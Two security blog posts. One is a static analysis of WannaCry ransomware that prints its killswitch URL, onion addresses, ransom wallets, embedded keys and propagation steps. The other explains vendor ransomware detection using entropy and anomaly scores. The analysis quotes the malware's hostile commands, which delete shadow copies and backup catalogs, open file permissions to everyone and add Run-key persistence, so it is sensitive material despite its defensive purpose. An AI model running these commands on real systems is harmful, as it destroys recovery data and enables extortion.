As we discussed Friday when this outbreak began, the WCry or WanaCrypt0r ransomware spread quickly across Europe and Asia, impacting almost 100 countries and disrupting or closing 45 hospitals in the UK. As the ransomware continued to propagate, I got my hands on a sample and quickly began analyzing the malware. This post will walk through my findings and provide a technical overview of the strain of WCry ransomware which caused the massive impact on Friday. Many have done great work analyzing this malware in action and helping contain its spread, and I hope my comprehensive static analysis will provide a good overall picture of this particular ransomware variant on top of that.

The Note

With estimates of over 100,000 computers impacted globally thus far, many people received unwelcome notes Friday similar to those below demanding a fee to decrypt their files. Notes like these are unfortunately all too common and typical of today’s ransomware. While the notes promise to return the data, paying the ransom does not guarantee that the data comes back safe and sound. But if it gets this far and adequate backups are not in place, paying may be the only recourse the victim has. No one ever wants to see one of these.

Ransom Note


Ransom Note Desktop Background


Where to Begin?

There has been a lot of discussion about the method of propagation and the overall impact of this ransomware, but what does this ransomware actually do from start to finish? That is the question I’ll answer in this post.

To begin, we obtained the sample (SHA256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/MD5 Db349b97c37d22f5ea1d1841e3c89eb4) from VirusTotal. See the appendix for a summary of the files dropped with the malware.

Dropper Malware Details

MD5: Db349b97c37d22f5ea1d1841e3c89eb4


Dropped EXE Details

MD5: 84c82835a5d21bbcf75a61706d8ab549


The WCry Execution Flow

The WCry ransomware follows a flow similar to that of other ransomware as it damages a machine. At a high level, it begins with an initial beacon, which other researchers have already reported is basically a killswitch function. If it makes it past that step, it looks to exploit the ETERNALBLUE/MS17-010 vulnerability and propagate to other hosts. WCry then goes to work on the system, first laying the foundations for doing the damage and getting paid for recovery, and once that’s done, encrypting files on the system. See the diagram below for an overview of how this malware works. I’ll walk through each of these steps in more detail below.


As the graphic illustrates, the malware inflicts damage by executing a series of tasks. I’ll walk through each of these tasks, which are numbered below. Each first level of the outline corresponds to that step in the execution flow graphic.
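Before the details, it helps to see how the inverted killswitch logic gates everything else. The following is a toy model of the high-level flow only, not code recovered from the sample. The stage names and the `beacon_succeeds` callback are assumptions made for illustration, and nothing here touches the network.

```python
from typing import Callable, List


def execution_stages(beacon_succeeds: Callable[[], bool]) -> List[str]:
    """Return the ordered stages that would run for a given beacon outcome."""
    stages = ["beacon"]
    if beacon_succeeds():
        # Inverted logic: a successful connection makes the malware quit.
        stages.append("quit")
        return stages
    # The beacon failed, so the rest of the flow proceeds.
    stages += ["propagate", "prepare", "encrypt"]
    return stages
```

Calling `execution_stages(lambda: True)` models a host that can reach a sinkholed killswitch domain, while `execution_stages(lambda: False)` models a host that cannot.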

Initial infection and propagation

1. Beacon to hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. Successful connection will cause the malware to quit. Note that other researchers have reported seeing strains since Friday which have an alternate killswitch URL.

2. Run the resource Exe as a new service

a. If Command line args as “-m security”

1. OpenSCManager

2. Create a new service called “Microsoft Security Center (2.0) Service” (“mssecsvc2.0”) as mssecsvc.exe

3. StartService

4. Load Resource “tasksche.exe”

5. Save as C:\WINDOWS\tasksche.exe

6. Move C:\WINDOWS\tasksche.exe to C:\WINDOWS\qeriuwjhrf

b. Else Propagate via SMB ETERNAL BLUE / DOUBLE PULSAR Exploit

1. OpenSCManager

2. Access service “mssecsvc2.0”

3. Change Service Config

4. Start Service Ctrl Dispatcher (Run SMB Exploit)

a. Run thread containing the Payload transfer


Setting up the payload

b. GetAdaptersInfo to get IPs

c. New thread to propagate the payload


Payload Delivery

1. Get TCP Socket for Port 445 (Server Message Block/SMB)
2. Connect to SMB Socket and get SMB tree_id

a. SMB_COM_NEGOTIATE
b. Get Tree: ipc_share = "\\\\#{ip}\\IPC$" and SMB_COM_TREE_CONNECT_ANDX
c. SMB_COM_TRANSACTION


Example Pseudocode: The screenshot above is from the Metasploit Framework's implementation, created after the Shadow Brokers leaks and the recent weaponized exploit from RiskSense-Ops.

3. Run smb ms17-010 Exploit function
a. do_smb_ms17_010_probe(tree_id)

1. Setup SMB_TRANS_PKT

b. If vulnerable, do_smb_doublepulsar_probe(tree_id)
1. Prepare Base64 Payload in Memory
2. Setup SMBv1 Echo Packet
3. make_smb_trans2_doublepulsar

a. Setup SMB_TRANS2_PKT (See Appendix)
4. if code == 0x51: Successful payload
c. Execute Payload Shellcode (See Appendix)
If code == 0x51 - successful payload!!!

c. After Service execution

1. Gets the computer name
2. Randomizes string
3. Get command line args and Checks for switch “/i”

Preparation for Ransomware Activity

3. Extract Zip and Prep Tor and Bitcoin Info:

a. Extract resource zip file XIA with hardcoded password “WNcry@2ol7”
b. Get c.wnry, which includes the Tor configuration used by the malware
c. Extract the configuration from c.wnry to get the Tor browser and onion sites to be used for communication:

gx7ekbenv2riucmf.onion;

57g7spgrzlojinas.onion;

xxlvbrloxvriy2c5.onion;

76jdd2ir2embyv47.onion;

cwwnhwhlz52maqm7.onion;

hxxps://dist[.]torproject[.]org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

d. Load Bitcoin wallets which have been previously set up by the attackers for payment for file restoration and update c.wnry

“13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94”

“12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"

“115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"

4. Hide Extract Zip Directory and Modify Security Descriptors

a. Create process: Runs command to hide current directory: "attrib +h ."
b. Runs command: icacls . /grant Everyone:F /T /C /Q. This grants all users full access to files in the current directory and all directories below.

5. Prep Encryption Public Key, AES Key, Decrypt the DLL

a. Load exports with getprocaddress: CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle
b. Set up Encryption Keys

1. Set up Crypto function exports: CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey, CryptAcquireContextA
2. Get RSA_AES Cryptographic Provider
3. CryptImportKey import the hard coded public key

BOOL WINAPI CryptImportKey(
  _In_  HCRYPTPROV hProv,
  _In_  BYTE       *pbData,
  _In_  DWORD      dwDataLen,   // 1172B 2048 bit RSA key (See Appendix)
  _In_  HCRYPTKEY  hPubKey,
  _In_  DWORD      dwFlags,
  _Out_ HCRYPTKEY  *phKey
);

4. Parse t.wnry to get AES key used to decrypt the DLL
a. WANACRY! Length 8
b. Read Length 100h = Encrypted AES Key
c. Read 4h = 04 00 00 00
d. Read 8h DLL Length = 00 00 01 00 00 00 00 00
e. Decrypt Encrypted AES Key with Public Key
f. Read encrypted DLL length 10000h
g. Decrypt DLL with custom AES-128-CBC algorithm with 16B AES Key (See Appendix)
5. Get Native System Info and GetProcessHeap

6. Put EncryptedData In Heap Location
7. Change the protection of that memory location.
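For analysts who want to carve the same fields out of t.wnry, the read sequence above can be sketched as a small parser. This is a hedged sketch, not the malware's code. It assumes the fields are little-endian and that a 4-byte length field (value 100h) precedes the encrypted key, which the outline does not spell out. `parse_wnry` and `WnryContainer` are names invented for this example, and the parser performs no decryption.

```python
import struct
from dataclasses import dataclass

MAGIC = b"WANACRY!"  # 8-byte marker at the start of the file


@dataclass
class WnryContainer:
    encrypted_key: bytes   # RSA-encrypted AES key (100h bytes in the outline)
    file_type: int         # 4-byte field, 04 00 00 00 in the outline
    payload_length: int    # 8-byte length of the encrypted DLL
    payload: bytes         # encrypted DLL bytes, left untouched


def parse_wnry(blob: bytes) -> WnryContainer:
    """Split a t.wnry-style blob into its header fields and encrypted body."""
    if blob[:8] != MAGIC:
        raise ValueError("missing WANACRY! magic")
    offset = 8
    # Assumption: a little-endian uint32 key length precedes the key itself.
    (key_len,) = struct.unpack_from("<I", blob, offset)
    offset += 4
    encrypted_key = blob[offset:offset + key_len]
    if len(encrypted_key) != key_len:
        raise ValueError("truncated encrypted key")
    offset += key_len
    # 4-byte type field followed by the 8-byte payload length.
    file_type, payload_length = struct.unpack_from("<IQ", blob, offset)
    offset += 12
    return WnryContainer(encrypted_key, file_type, payload_length, blob[offset:])
```

Comparing `payload_length` with `len(payload)` is a quick sanity check that the file was carved correctly before attempting the decryption steps.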

Encrypted DLL Details

96de5f0587f7201b9f5f16ba2e374f80


Spoofed information in the decrypted DLL’s VERSIONINFO resource

6. Run DLL Export at function TaskStart

7. Creates Encryption Keys to be used by the user file encryption routine

a. Create Encryption Key by encrypting the user’s private key with the ransomware public key and storing it in “%08X.eky” (See Appendix)
b. Also tries to access “%08X.dky” for the received Decryption key

8. Creates Mutex for all threads: Global\\MsWinZonesCacheCounterMutexW

a. Other researchers have noted that if this mutex is present, the malware will not start, offering another way to defend against this malware.

9. Creates a new thread pointing to the setup that starts encrypting files

a. Generates AES Keys to encrypt files using CryptGenKey

Encryption routine

10. Creates a new thread to overwrite files on disk

a. Generate a key
b. Generate Data Buffers for each file
c. Call thread for function StartAddress to begin writing encrypting file contents
d. Tack on extension “.WNCRYT”

11. Run new process taskdl.exe in a new thread

12. Set Up the Decrypter Persistence:

a. Read Configuration File
b. Finds the location of @WanaDecryptor@.exe
c. Create process “taskse.exe @WanaDecryptor@.exe”
d. Set persistence key to run itself on reboot HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
e. CheckTokenMembership, GetComputerName Info
f. Run: cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "<rand>" /t REG_SZ /d "\"tasksche.exe\"" /f
g. Looks for “f.wnry” (what this is for is not clear in my analysis)

@WanaDecryptor@.exe Details

MD5: 7bf2b57f2a205768755c07f238fb32cc


Spoofed information in the decrypted DLL’s VERSIONINFO resource

13. Runs: @WanaDecryptor@.exe fi

a. Reads config file for Tor Client
b. Runs Tor Client. Note that I did not drill into the communications deeply during this analysis. It’s basically connecting to the .onion sites listed above to allow for user payment and tracking.

14. Creates @WanaDecryptor@.exe persistence and backup

a. Creates lnk file @WanaDecryptor@.exe.lnk via batch script

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs

b. Write to <randominteger>.bat

1. Execute batch script
2. Delete: del /a %%0

15. Creates Ransom Notes @Please_Read_Me@.txt from “r.wnry”
16. Encrypts files and kills database and email server-related processes if they are running

a. Capture UserName
b. Get Drive Type
c. Runs:

taskkill.exe /f /im Microsoft.Exchange.*

taskkill.exe /f /im MSExchange*

taskkill.exe /f /im sqlserver.exe

taskkill.exe /f /im sqlwriter.exe

taskkill.exe /f /im mysqld.exe

d. Check Free Disk Space
e. Loops through files and encrypts (See Appendix for the targeted extensions)

17. Runs: @WanaDecryptor@.exe co

a. Writes to .res file compiled by the time decrypted

b. Run Tor service: taskhsvc.exe TaskData\Tor\taskhsvc.exe

18. Runs: cmd.exe /c start /b @WanaDecryptor@.exe vs

a. Deletes the volume shadow copies with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
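The recovery-tampering command in the final step is a useful detection opportunity, since legitimate software rarely chains these operations together. Below is a minimal sketch of matching process command lines against that behavior. The pattern list and the `recovery_tampering_hits` helper are illustrative assumptions, not a production rule set and not how any particular product implements detection.

```python
import re

# Illustrative patterns derived from the command line shown in the last step.
RECOVERY_TAMPERING = [
    ("vssadmin delete shadows",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic shadowcopy delete",
     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("bcdedit recoveryenabled no",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no", re.I)),
    ("bcdedit ignoreallfailures",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\S+\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("wbadmin delete catalog",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
]


def recovery_tampering_hits(command_line):
    """Return the names of every tampering pattern found in a command line."""
    return [name for name, pattern in RECOVERY_TAMPERING
            if pattern.search(command_line)]
```

A single hit may be an administrator doing maintenance. Several hits in one command line, as in the WCry example, is a much stronger signal.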

Conclusion

Despite its ability to propagate so quickly, the ransomware activities taken by this malware are not particularly interesting or novel. As this analysis shows, the killswitch in the execution flow provided a unique opportunity to slow down the ransomware. As security researcher MalwareTech discovered, and Talos described in detail, this malware was programmed to bail out upon a successful connection to that server, which stops the malware altogether. We should all thank MalwareTech for setting up the sinkhole, which caused this outbreak to slow sooner than it otherwise would have.

This malware is easy to modify. As mentioned above, other researchers are already finding variants in the wild. If you’re running Windows and haven’t patched yet, now’s the time to do it. And while you’re at it, go test your backups to build some confidence that you won’t be forced to choose between paying up or losing data should the worst happen to you or your organization.

Appendix

Summary of Files


Zip File (b576ada...31) Contents


Extensions to encrypt

.doc,.docx,.docb,.docm,.dot,.dotm,.dotx,.xls,.xlsx,.xlsm,.xlsb,.xlw,.xlt,.xlm,.xlc,.xltx,.xltm,.ppt,.pptx,.pptm,.pot,.pps,.ppsm,.ppsx,.ppam,.potx,.potm,.pst,.ost,.msg,.eml,.edb,.vsd,.vsdx,.txt,.csv,.rtf,.123,.wks,.wk1,.pdf,.dwg,.onetoc2,.snt,.hwp,.602,.sxi,.sti,.sldx,.sldm,.sldm,.vdi,.vmdk,.vmx,.gpg,.aes,.ARC,.PAQ,.bz2,.tbk,.bak,.tar,.tgz,.gz,.7z,.rar,.zip,.backup,.iso,.vcd,.jpeg,.jpg,.bmp,.png,.gif,.raw,.cgm,.tif,.tiff,.nef,.psd,.ai,.svg,.djvu,.m4u,.m3u,.mid,.wma,.flv,.3g2,.mkv,.3gp,.mp4,.mov,.avi,.asf,.mpeg,.vob,.mpg,.wmv,.fla,.swf,.wav,.mp3,.sh,.class,.jar,.java,.rb,.asp,.php,.jsp,.brd,.sch,.dch,.dip,.pl,.vb,.vbs,.ps1,.bat,.cmd,.js,.asm,.h,.pas,.cpp,.c,.cs,.suo,.sln,.ldf,.mdf,.ibd,.myi,.myd,.frm,.odb,.dbf,.db,.mdb,.accdb,.sql,.sqlitedb,.sqlite3,.asc,.lay6,.lay,.mml,.sxm,.otg,.odg,.uop,.std,.sxd,.otp,.odp,.wb2,.slk,.dif,.stc,.sxc,.ots,.ods,.3dm,.max,.3ds,.uot,.stw,.sxw,.ott,.odt,.pem,.p12,.csr,.crt,.key,.pfx,.der

Public RSA2 Key to Decrypt AES Key (Converted to Base64 for Display)

BwIAAACkAABSU0EyAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/vGdcS2q6G2fkOvgKvePNbSb4MmK+1X9aKTAVIZJxA4Rz5PMTkQggtsriK5gtt35PMNOhIMJNd340usz015GYwrYvnID3gydlsNkt5uWTNvF4kSNSIkBw9F05lDOz7GyvsXMMG1mw52Gx+I59Ar0BhtPux9oLNoSa4jcg4j5QDTvu77Bde3Ub35/vfJSGtNb2bHbUBP06wILcjNnmBKTze4nbX5h+f6i2lxGqqQDANzP5Y6Ykoy9fknHu5UBenMSE7tJHzhKa9ngPK6c3uTSsp+gIP5yyuML2FzC0TgxJT0/NBTvUj1s5fQc2BfDvwSYG47o01PLrsksfuzyRjAfNK9Nnai+LApKV/2o88UBnswjNaj+57WumDepb9lEtpUJrSNNEJYUWWfdgSXqiuesAmpW/W5WSTAxOjKW0DJPfCielGRnKrVNzYx3UPLRMx522IoT6hLb7/25TRvW3jwlXHyvsrYzEXl0KRkyHdUyUdZMmVZNm1ep+jyuIPGWbkBLVNb10zdhzpIHFLIuBVXpFWVJQ8Njv9/qFi0N/TbpWL4ZbOT3x4OCteXxuMk4BabSNvbfcZiPGMPVIb2Ku01KCIDaz7evrCNcSnqVBiSqyYmzDhWTdRDG0odKwR2XA4LDXTuNnxt0+hNDaLKWE5NQBw3nPl1Ry7XrhgtnBJhXllRnqUgdbMEgWEQ0Bt/HdVjkX4PbmHp4nSWSjOFppT3J2Ck62xPLmmLaqdQ+zifcoyL08tXy5YOHcuKxsK+v55WoDhjSNnQP/T05V6FL6TG/jvN8LuyL9ZPJxdJbZE/2ub6bT9WYW68ToBBfE+Yg1/H+KBl2ZjkCC7lrTPRMd8fn0lLjE1iyoYq9JByTKqS8rvKB2/KpwcNgJrAg+n7RDAoNrPCXJZW8Y8+RV/qiIAcuClXHkGbmI1M4lWq1/x/ZNiToEePfwFaaQvURviyA6mhqK/naScs9yJs+Ow8Ndg1mzeaR7JsAKFltc1hjYWW+YF4fkL7SWA4AoExZZdNGxM8ODHt4qQPJiiepLqUekF7H08yc2qtmaz20jPfftt3QS5G5eevuFYZv3pcKz5/7YjF/3wNQxBOjiaLz8WKuipczB8OMnEfsZopHj+bQAoTjOH5bbJxT3sDpID6xWbOHO/D8F7WolR8Zdx9dXKRJ+H5901bcAfzVuTwQAO8aklyPboi8c=

AES Decrypted Key for Decrypting the DLL

BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6

Extracting Encrypted AES Key and Encrypted DLL from t.wnry


Hard Coded Public Key to Encrypt User Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQB1l0w7hEbeLCr0lahdwM1t2tfUkh4TgjRqcI2PfPcEklV/8aInsp5BrJCAkRiTwrF7rSvz/6/bK1G+HaMn46dXCFq+wR32BPgcvluxZ/vkyNp1AHCxF3AkbAljdKxLCh1xrn+uZbjFhnnFfp+YYExSuSliyyMp7TGRdHt7CyYb8n1nv9p6QNryYU2UpX2tWWutnqM6OcZbbp/Suza19dJl9Sww2MEXva8oAJYgRqctYgMM19B1oAsH6tQfyujZTts48iZ1yxKmiHCb4eoy3PhxclBB5heBaCdCjt/l3qFy2Tv75Z0wEWmSzWAr4tVGPCjPnTBK9625+w+R/i6+GPHO

Dll Decrypt Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/v

Other Files


Struct for SMB_TRANS2_PKT


Screenshot of Shellcode in SMB1 Trans2 Packet Body


↧

So You Wanna Stop Ransomware? Detailing Endgame Ransomware Protection

May 22, 2017, 10:52 am


Last week, WannaCry left its mark across the globe, affecting hundreds of thousands of machines in over 100 countries. While it certainly has been more widespread than previous ransomware, WannaCry is just the latest example of the growing prevalence of ransomware. As I explained in a previous post, ransomware is now a billion dollar industry, and is only growing in popularity among attackers due to the risk calculus and profitable business model.

Although WannaCry included fairly unsophisticated ransomware, it leveraged the Eternal Blue SMBv1 exploit from the Shadow Brokers data dump to propagate to other hosts. It is important to catch these kinds of attacks as early as possible in the attack chain, but what happens when those steps are circumvented by extremely customized and sophisticated techniques? This is why a layered approach to detection and prevention is necessary. While Endgame's layered protection approach ensures that we have the means to prevent and detect threats throughout multiple steps of the attack chain, there needs to be an additional line of defense in the event that ransomware or other destructive malware manages to be invoked on a host. Endgame ransomware protection provides that capability.

Approach

The core functionality of ransomware often is different compared to other malware. Ransomware attackers have a very straightforward mission: make files inaccessible and collect ransom payments from the affected users in order to restore access. Therefore, the code can be as simple as modifying files and providing recovery capabilities. It often does not contain large amounts of, or any, code for network communications with a command and control server, evading endpoint defenses, persistence mechanisms, or user surveillance capabilities, all of which are common attributes of other types of malware. Because of this, simple ransomware often gets through other endpoint protection mechanisms. This, combined with the enormous impact of a ransomware campaign, means that defenders require specialized capabilities to detect and block ransomware activity on a host at runtime before critical data is lost.

Endgame has provided customers with ransomware protection in our endpoint agent, and will continually enhance this feature going forward. Our approach to solving this problem at runtime involves many pieces operating in parallel. I will discuss three of these in this post:

File operations
Shannon entropy
Anomaly scores

File operations will drive analysis of file data and metadata, Shannon entropy is utilized to make key observations regarding the file content in a mathematical context, and anomaly scores are derived from file entropy and a variety of other measurements and characteristics. These concepts combine to provide introspection into each active process and allow us to detect ransomware activity.

File Operations and Anomaly Scores

The first building block is to gain visibility on activities on the filesystem. While a Windows host is active, files are constantly being created, modified, and read in the background. These file operations contain a wealth of information that can serve as the foundation for any ransomware detection capability, but the number of operations that may occur in a minute can be in the tens or even hundreds of thousands. In the face of this deluge of data, filtering plays a crucial role in separating the signal from the noise.

Our filtering approach is based around the following three pieces of data:

Operation
Process
Anomaly scores

If we were to analyze a file every single time one is opened, closed, read, or modified, that would result in an overwhelming amount of redundant analysis. When it comes to ransomware, though, we are primarily concerned with whether a file has been modified. For the sake of data simplification, we group file modifications by the following high level operations:

Create
Write
Rename
Delete

Once we're limited to those four file operations, we attribute each incoming file operation to a single process. Since we are attempting to distinguish ransomware activity on a per-process basis, we need the means to analyze each relevant operation and how it relates to the process by which it was invoked. This grouping will help us maintain metrics on processes over time and quickly determine anomalous activity as it begins to occur.
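To make the filtering and attribution concrete, here is a minimal sketch of the idea, assuming file events arrive as `(pid, operation, path)` tuples. That event shape and the function name are assumptions for illustration. A real agent would source these events from a filesystem driver and keep far richer state.

```python
from collections import Counter, defaultdict

# The four high-level modification operations named above.
TRACKED_OPERATIONS = {"create", "write", "rename", "delete"}


def group_by_process(events):
    """Count tracked file operations per process, ignoring everything else.

    events: iterable of (pid, operation, path) tuples (hypothetical shape).
    """
    per_process = defaultdict(Counter)
    for pid, operation, _path in events:
        op = operation.lower()
        if op in TRACKED_OPERATIONS:
            per_process[pid][op] += 1
    return per_process
```

Reads, opens, and closes fall out at the filter, so the per-process counters only grow when a process actually modifies the filesystem.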

Each file that is modified by a particular process, along with the process itself, is assessed a score that reflects the level of anomalous characteristics that were discovered through analysis. The effect that each characteristic has on the anomaly score will vary depending on how abnormal the characteristic is when compared to a particular baseline. This weighted score is based along a scale, with more anomalous attributes being weighted higher. The scale is derived from a combination of applied mathematics along with domain expertise honed through thorough manual and automated analysis of ransomware samples.


Several metrics are taken into account when compiling anomaly scores

Finally, the affected filepath provides several key data points that can be used to filter out and group file operations:

Directory
File extension
File name

Certain file directories might typically see higher volumes of data modifications than others. In these cases, we can opt for less rigorous analysis of these directories to avoid overtaxing our detector. There are also other directories that are only typically modified by one or more specific processes with a certain level of privileged access, so any processes modifying these directories that do not fit within the normal range would immediately appear to be anomalous.

Depending on the extension of the file that has been modified, a particular operation may be viewed as more or less relevant. For instance, consider a file with a known temporary file extension compared to a Word document file. Both files will be analyzed in the same manner, but a higher weight will be factored into any anomaly score calculations for operations relating to the Word document as opposed to those pertaining to the file with the temporary extension.

The number of unique file extensions, the number of files per unique file extension, and the specific file extensions that are modified all factor into the anomaly score for each process. A process that modifies several files across extensions that are known to be typically targeted by ransomware would generally be viewed as more anomalous than a process that modifies mostly temporary or helper files avoided by ransomware.
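As a rough illustration of how these extension metrics might feed a score, consider the sketch below. The weights and the way the metrics are combined are invented for this example and are not Endgame's scoring model. The point is only that targeted document types and breadth across extensions both push the score up.

```python
import os
from collections import Counter

# Hypothetical weights: commonly targeted document types score high,
# temporary or helper files score low. Real values would be tuned on data.
EXTENSION_WEIGHTS = {".docx": 3.0, ".xlsx": 3.0, ".pdf": 3.0,
                     ".tmp": 0.2, ".log": 0.2}
DEFAULT_WEIGHT = 1.0


def extension_metrics(modified_paths):
    """Summarize the extensions a process modified and derive a toy score."""
    counts = Counter(os.path.splitext(path)[1].lower() for path in modified_paths)
    weighted_files = sum(EXTENSION_WEIGHTS.get(ext, DEFAULT_WEIGHT) * n
                         for ext, n in counts.items())
    return {
        "unique_extensions": len(counts),
        "files_per_extension": dict(counts),
        # Toy combination: weighted file count scaled by extension breadth.
        "score": weighted_files * len(counts),
    }
```

Under these made-up weights, a process that rewrites a handful of Office documents across two extensions scores far higher than one that churns through the same number of `.tmp` files.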

Shannon Entropy

While I could write a long-winded description of Shannon entropy and how it relates to file contents, I'd rather recommend this excellent write-up by Lance Mueller of ForensicKB instead. In short, entropy is a measure of the randomness of a specified set of data. The more random the data is, the higher its calculated entropy will be. Low-to-middle entropy data tends to contain only a subset of the 256 possible byte values (0x00 - 0xFF), while high entropy data contains byte values that span the entire range. This can be extrapolated to presume that text-based file types (e.g. XML, HTML, TXT) will generally have lower entropy values than binary file types (e.g. EXE, DLL, MSI), among others.
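For readers who prefer code to prose, the following is a minimal sketch of the standard byte-level Shannon entropy calculation, in bits per byte. The function name `shannon_entropy` is my own; this is the textbook formula, not necessarily the exact routine used in the product.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    # Sum -p * log2(p) over every byte value that actually occurs.
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(data).values()
    )


print(shannon_entropy(b"\x00" * 1024))     # one repeated byte value: minimum entropy
print(shannon_entropy(bytes(range(256))))  # every byte value equally likely: maximum
```

A buffer holding a single repeated byte value scores 0.0 bits / byte, while one in which all 256 byte values are equally frequent scores the maximum of 8.0.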

High entropy Disney television show

So, how can entropy be used to help detect ransomware? For individual file types / extensions, we can devise expected entropy ranges based on manual inspection of the file specification as well as by calculating the average entropy for a sufficiently large set of sample files. Since typical encryption algorithms produce high entropy output, we're interested in files that have been modified or created and now possess entropy values that exceed the predetermined range for their file type. Also, if the average entropy of the files being modified by a given process is higher than the expected average entropy for their file types, this can reasonably be treated as an even stronger indicator of potentially anomalous activity than a single file exceeding its typical entropy range.
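The two checks described above can be sketched as follows. The per-extension upper bounds are invented for illustration, and comparing averages against those bounds is a simplification of my own; real ranges would come from the file specifications and sample sets mentioned above.

```python
from statistics import mean

# Hypothetical upper bounds (bits / byte) for the expected entropy of each type.
EXPECTED_MAX_ENTROPY = {".xml": 6.0, ".html": 6.0, ".txt": 5.5}


def exceeds_expected(extension: str, entropy: float) -> bool:
    """True if a single file's entropy is above the bound for its type."""
    limit = EXPECTED_MAX_ENTROPY.get(extension.lower())
    return limit is not None and entropy > limit


def process_average_exceeds(observations) -> bool:
    """observations: (extension, entropy) pairs for files one process wrote.

    True if the average observed entropy is above the average bound for the
    same files. Extensions without a known bound are ignored.
    """
    known = [
        (ext.lower(), entropy)
        for ext, entropy in observations
        if ext.lower() in EXPECTED_MAX_ENTROPY
    ]
    if not known:
        return False
    observed = mean(entropy for _, entropy in known)
    expected = mean(EXPECTED_MAX_ENTROPY[ext] for ext, _ in known)
    return observed > expected


print(exceeds_expected(".xml", 5.212))  # within the assumed XML range
print(exceeds_expected(".xml", 7.918))  # above the assumed XML range
```

The two entropy values in the usage lines are the ones measured for the sample XML file in this post, before and after encryption.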

Take for instance an XML file. XML files typically consist of text data that is represented by bytes within the ASCII range (0x00 - 0x7F), though they do not use the full extent of the characters within that range. As 8.0 bits / byte is the highest possible entropy value and 0.0 bits / byte is the lowest possible entropy value, we should generally expect XML files to fall somewhere within the middle range of possible entropy values due to their relatively limited usage of byte values.

Sample XML file (Entropy - 5.212 bits / byte)

Now, when that same file is run through an encryption algorithm (AES-256 in CBC mode in this instance), we can see that the contents become scrambled and incoherent, and no discernible words in English are readable.

XML file after AES-256 (CBC Mode) encryption (Entropy - 7.918 bits / byte)

It should come as no surprise, then, that the entropy value has significantly increased from 5.212 to 7.918. For a file type such as XML, the encrypted entropy value far exceeds its expected range and is much closer to being perfectly random than a normal file of its type should be, which would come across as very anomalous to our protection feature.

Detection of high entropy is not a complete solution. Compressed data must be handled. It tends to possess high entropy, so the acceptable entropy range for certain file types needs to be adjusted. This makes it difficult to tell the difference between compressed data and encrypted data. While Monte Carlo pi approximation, chi square distribution, and other calculations may help distinguish between encrypted and compressed content, the additional overhead introduced by these calculations may cause unacceptable slowdown when processing thousands of files per minute.
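As an illustration of one of the extra calculations mentioned above, here is a minimal sketch of a Pearson chi-square statistic computed over a byte histogram against a uniform distribution. The function name is my own. The idea that ciphertext tends to sit closer to uniform (a lower statistic) than compressed data is a common heuristic and an assumption here, not a guarantee.

```python
from collections import Counter


def chi_square_uniform(data: bytes) -> float:
    """Pearson chi-square statistic of the byte histogram vs. a uniform one."""
    if not data:
        raise ValueError("data must not be empty")
    expected = len(data) / 256  # count each byte value would have if uniform
    counts = Counter(data)
    return sum(
        (counts.get(value, 0) - expected) ** 2 / expected
        for value in range(256)
    )


print(chi_square_uniform(bytes(range(256)) * 4))  # perfectly uniform histogram
print(chi_square_uniform(b"A" * 256))             # maximally skewed histogram
```

Even this simple statistic needs a full pass over each file's contents, which is the kind of overhead that adds up when thousands of files are processed per minute.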

Another issue is that there are also ransomware variants that employ encryption routines which produce much lower entropy data than typical encryption algorithms, so a file lacking high entropy is not definitively an indicator that it is likely benign. Other approaches are needed to deal with this case, which are beyond the scope of this post.

